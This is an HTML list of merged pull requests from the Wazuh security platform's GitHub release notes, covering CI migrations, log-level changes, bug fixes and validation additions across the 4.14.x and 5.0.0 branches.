<li>Bump 4.14.6 branch by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/wazuhci/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/wazuhci">@wazuhci</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4742531433" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37176" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37176/hovercard" href="https://github.com/wazuh/wazuh/pull/37176">#37176</a></li>
<li>Add libcrypt fix (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4614551071" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36782" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36782/hovercard" href="https://github.com/wazuh/wazuh/pull/36782">#36782</a>) to 4.14.6 changelog by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4743056771" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37178" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37178/hovercard" href="https://github.com/wazuh/wazuh/pull/37178">#37178</a></li>
<li>Delay IndexerDownloader connection warnings until 3 failed attempts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4742582733" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37177" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37177/hovercard" href="https://github.com/wazuh/wazuh/pull/37177">#37177</a></li>
<li>Add parameterized target selection to Coverity scan workflow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lchico/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lchico">@lchico</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4740074465" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37171" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37171/hovercard" href="https://github.com/wazuh/wazuh/pull/37171">#37171</a></li>
<li>Align remoted tier 2 CodeBuild setup by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4735418555" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37155" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37155/hovercard" href="https://github.com/wazuh/wazuh/pull/37155">#37155</a></li>
<li>Add rules migration guide by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jorgesnchz/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jorgesnchz">@Jorgesnchz</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4495888102" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36305" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36305/hovercard" href="https://github.com/wazuh/wazuh/pull/36305">#36305</a></li>
<li>Migrate agent Linux/Windows test workflows to AWS CodeBuild runners by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4720554249" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37051" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37051/hovercard" href="https://github.com/wazuh/wazuh/pull/37051">#37051</a></li>
<li>Silence spurious keepalive warnings on the Windows agent by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4745531717" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37187" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37187/hovercard" href="https://github.com/wazuh/wazuh/pull/37187">#37187</a></li>
<li>wazuh-engine: Improve log messages and logger by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4688784533" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36995" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36995/hovercard" href="https://github.com/wazuh/wazuh/pull/36995">#36995</a></li>
<li>Set default indexer connector credentials by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4746445718" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37192" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37192/hovercard" href="https://github.com/wazuh/wazuh/pull/37192">#37192</a></li>
<li>Fix incorrect snprintf size calculation in winevtchannel decoder by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4750564321" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37198" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37198/hovercard" href="https://github.com/wazuh/wazuh/pull/37198">#37198</a></li>
<li>Align VD feed-download log levels with indexer consumer state by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4750803257" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37199" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37199/hovercard" href="https://github.com/wazuh/wazuh/pull/37199">#37199</a></li>
<li>Recognize renamed indexer consumer status in engine sync by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4751474129" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37204" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37204/hovercard" href="https://github.com/wazuh/wazuh/pull/37204">#37204</a></li>
<li>Merge 4.14.6 into 4.14.7 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4752903836" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37210" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37210/hovercard" href="https://github.com/wazuh/wazuh/pull/37210">#37210</a></li>
<li>Token replacement to avoid permission errors by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarcelKemp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarcelKemp">@MarcelKemp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4753550212" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37237" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37237/hovercard" href="https://github.com/wazuh/wazuh/pull/37237">#37237</a></li>
<li>Merge 4.14.7 into 5.0.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4752941791" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37211" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37211/hovercard" href="https://github.com/wazuh/wazuh/pull/37211">#37211</a></li>
<li>Eliminate TOCTOU races in healthcheck file operations by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rjcausarano/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rjcausarano">@rjcausarano</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4736827470" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37160" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37160/hovercard" href="https://github.com/wazuh/wazuh/pull/37160">#37160</a></li>
<li>Sca file policy block standardization by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Johnng007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Johnng007">@Johnng007</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4743999327" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37179" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37179/hovercard" href="https://github.com/wazuh/wazuh/pull/37179">#37179</a></li>
<li>Bind agent index selection and scope deletes by cluster by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4735319890" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37154" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37154/hovercard" href="https://github.com/wazuh/wazuh/pull/37154">#37154</a></li>
<li>Add Null Check for Inode and Dev Fields in FIM Whodata Event Handler by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4766388009" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37245" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37245/hovercard" href="https://github.com/wazuh/wazuh/pull/37245">#37245</a></li>
<li>Docs/6764 logcollector whats new 5.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AnDumu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AnDumu">@AnDumu</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4721987109" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37056" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37056/hovercard" href="https://github.com/wazuh/wazuh/pull/37056">#37056</a></li>
<li>Repair RPM builder toolchain downloads by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4728182443" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37130" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37130/hovercard" href="https://github.com/wazuh/wazuh/pull/37130">#37130</a></li>
<li>Add cluster name validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4753677014" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37238" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37238/hovercard" href="https://github.com/wazuh/wazuh/pull/37238">#37238</a></li>
<li>Add cluster readiness endpoint by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NahuFigueroa97/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NahuFigueroa97">@NahuFigueroa97</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4728071822" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37129" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37129/hovercard" href="https://github.com/wazuh/wazuh/pull/37129">#37129</a></li>
<li>Defer cluster payload buffer allocation until data is received by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4769731908" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37280" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37280/hovercard" href="https://github.com/wazuh/wazuh/pull/37280">#37280</a></li>
<li>Indexer connector bulk size and flush interval configurable by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LucioDonda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LucioDonda">@LucioDonda</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4736764012" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37158" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37158/hovercard" href="https://github.com/wazuh/wazuh/pull/37158">#37158</a></li>
<li>Enable shared-password enrollment by default by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4734529271" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37151" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37151/hovercard" href="https://github.com/wazuh/wazuh/pull/37151">#37151</a></li>
<li>Fix unit test workflow paths and report handling by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4777938328" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37317" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37317/hovercard" href="https://github.com/wazuh/wazuh/pull/37317">#37317</a></li>
<li>Migrate agent + server CI artifacts to S3 — 4.14.7 (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="643824078" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/5300" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/5300/hovercard" href="https://github.com/wazuh/wazuh/issues/5300">#5300</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="643806955" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/5298" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/5298/hovercard" href="https://github.com/wazuh/wazuh/issues/5298">#5298</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4745105538" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37186" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37186/hovercard" href="https://github.com/wazuh/wazuh/pull/37186">#37186</a></li>
<li>Handle eol amazon inspector classic by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rovogel/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rovogel">@rovogel</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4746717311" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37194" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37194/hovercard" href="https://github.com/wazuh/wazuh/pull/37194">#37194</a></li>
<li>Fix wazuh-modulesd missing after macOS agent restart by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cborla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cborla">@cborla</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4695257310" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37020" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37020/hovercard" href="https://github.com/wazuh/wazuh/pull/37020">#37020</a></li>
<li>Fix test_worker failing unit test by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4777598945" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37314" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37314/hovercard" href="https://github.com/wazuh/wazuh/pull/37314">#37314</a></li>
<li>Improve log messages  by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4671655779" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36876" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36876/hovercard" href="https://github.com/wazuh/wazuh/pull/36876">#36876</a></li>
<li>Improve changelog format by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4784576201" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37332" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37332/hovercard" href="https://github.com/wazuh/wazuh/pull/37332">#37332</a></li>
<li>Lower log level of transient cluster IPC failures (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4768765565" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37277" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/37277/hovercard" href="https://github.com/wazuh/wazuh/issues/37277">#37277</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4768737167" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37276" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/37276/hovercard" href="https://github.com/wazuh/wazuh/issues/37276">#37276</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4783970019" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37326" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37326/hovercard" href="https://github.com/wazuh/wazuh/pull/37326">#37326</a></li>
<li>Fix TypeError when sorting agents by version with empty version strings by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4779868587" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37323" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37323/hovercard" href="https://github.com/wazuh/wazuh/pull/37323">#37323</a></li>
<li>Migrate agent + server CI artifacts to S3 — 5.0.0 (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="643824078" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/5300" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/5300/hovercard" href="https://github.com/wazuh/wazuh/issues/5300">#5300</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="643806955" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/5298" data-hovercard-type="issue" data-hovercard-url="/wazuh/wazuh/issues/5298/hovercard" href="https://github.com/wazuh/wazuh/issues/5298">#5298</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4744978467" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37185" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37185/hovercard" href="https://github.com/wazuh/wazuh/pull/37185">#37185</a></li>
<li>Validate asset resource names before policy promotion by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jam300/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jam300">@jam300</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4741678194" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37172" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37172/hovercard" href="https://github.com/wazuh/wazuh/pull/37172">#37172</a></li>
<li>Revert wazuh-server indexer credentials and propagate log context in indexer connector by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4784669937" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37333" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37333/hovercard" href="https://github.com/wazuh/wazuh/pull/37333">#37333</a></li>
<li>Add VD readiness status HTTP endpoint by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4753007421" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37213" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37213/hovercard" href="https://github.com/wazuh/wazuh/pull/37213">#37213</a></li>
<li>Use github.workspace for wodles report paths by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4787326775" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37342" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37342/hovercard" href="https://github.com/wazuh/wazuh/pull/37342">#37342</a></li>
<li>Skip FIM whodata cases on the tier-2 Linux job (CodeBuild) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4771331061" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37291" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37291/hovercard" href="https://github.com/wazuh/wazuh/pull/37291">#37291</a></li>
<li>Migrate 4.x Windows test runners to AWS CodeBuild  by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4746542396" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37193" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37193/hovercard" href="https://github.com/wazuh/wazuh/pull/37193">#37193</a></li>
<li>Lower log level of transient queue send failures in modulesd by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lchico/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lchico">@lchico</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4788115193" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37345" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37345/hovercard" href="https://github.com/wazuh/wazuh/pull/37345">#37345</a></li>
<li>Add changelog check workflow by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4787529876" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37343" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37343/hovercard" href="https://github.com/wazuh/wazuh/pull/37343">#37343</a></li>
<li>Add changelog check workflow for 5.0.0 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4788939423" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37351" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37351/hovercard" href="https://github.com/wazuh/wazuh/pull/37351">#37351</a></li>
<li>Retry <code>OS_SendUnix</code> on <code>ENOBUFS</code> to stop dropping binary sync messages on macOS by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/nbertoldo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/nbertoldo">@nbertoldo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4788850753" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37349" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37349/hovercard" href="https://github.com/wazuh/wazuh/pull/37349">#37349</a></li>
<li>change: Allow null root_decoder as alias of empty string on policy cr… by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4788261828" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37347" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37347/hovercard" href="https://github.com/wazuh/wazuh/pull/37347">#37347</a></li>
<li>Fix eBPF FIM whodata for Amazon Linux by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4692775155" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/37014" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/37014/hovercard" href="https://github.com/wazuh/wazuh/pull/37014">#37014</a></li>
